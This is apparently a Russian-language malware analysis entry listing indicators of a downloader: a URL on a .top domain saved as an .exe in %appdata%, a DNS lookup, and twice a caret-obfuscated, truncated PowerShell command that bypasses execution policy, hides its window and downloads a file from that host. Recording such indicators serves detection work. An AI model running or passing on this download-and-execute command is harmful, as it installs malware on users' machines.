Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^WersHEl^L.^e^x^E^ ^-e^X^e^cu^TIonPO^LI^CY B^ypaSS^ ^-N^Op^r^of^I^le -^wi^NDow^stYl^E ^Hid^dEN^ ^(^N^Ew-O^BJEC^T^ sYSt^e^m.n^ET.w^e^bc^L^IEn^T).Do^WN^LOaDFI^L^e('http://www.do...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "Po^WersHEl^L.^e^x^E^ ^-e^X^e^cu^TIonPO^LI^CY B^ypaSS^ ^-N^Op^r^of^I^le -^wi^NDow^stYl^E ^Hid^dEN^ ^(^N^Ew-O^BJEC^T^ sYSt^e^m.n^ET.w^e^bc^L^IEn^T).Do^WN^LOaDFI^L^e('http://www.do...' (со скрытым окном)